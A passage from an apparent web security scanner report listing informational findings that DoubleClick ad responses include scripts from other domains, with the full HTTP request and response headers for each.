Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5083

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.15. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7335
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:13:17 GMT
Expires: Sun, 24 Apr 2011 16:13:17 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.16. http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.turn.com/B5269631.6

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3905.turn.com/B5269631.6;sz=160x600;ord=8461559076100471709?;click=http://r.turn.com/r/tpclick/id/nXvzACZ_bXWccgsA-gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7635
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:20:46 GMT
Expires: Sun, 24 Apr 2011 16:20:46 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Sun Feb 20 13:37:06 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.17. http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.158901.DATAXU/B5279302.4

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5662

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Apr 06 13:57:19 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.18. http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4515.131803.TURN/B5378843.4

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4515.131803.TURN/B5378843.4;sz=160x600;ord=4368933343399774953?;click=http://r.turn.com/r/tpclick/id/6Qq0bLqRoTxeyAkACAIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:23:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7977

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Mar 31 00:25:09 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.19. http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4637.158901.6939390485621/B5385253.8

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:56:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5643

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Oct 15 18:11:35 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.20. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7458
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:19:53 GMT
Expires: Sun, 24 Apr 2011 16:19:53 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Fri Apr 15 14:41:42 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.21. http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.158901.DATAXU/B5334493.10

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4248

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner
...[SNIP]...
<!-- Copyright 2009 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' language='javascript'
src='http://cdn.doubleverify.com/script66.js?agnc=564334&cmp=5334493&crt=40481615&dvtagver=3.3.1243.2031&adsrv=1&plc=61270887&advid=1831140&sid=1054404&adid=238218254'>
</script>
...[SNIP]...

24.22. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.13

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:29:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5603

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848019&advid=2179194&sid=973580&adid='></script>
...[SNIP]...

24.23. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.16

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
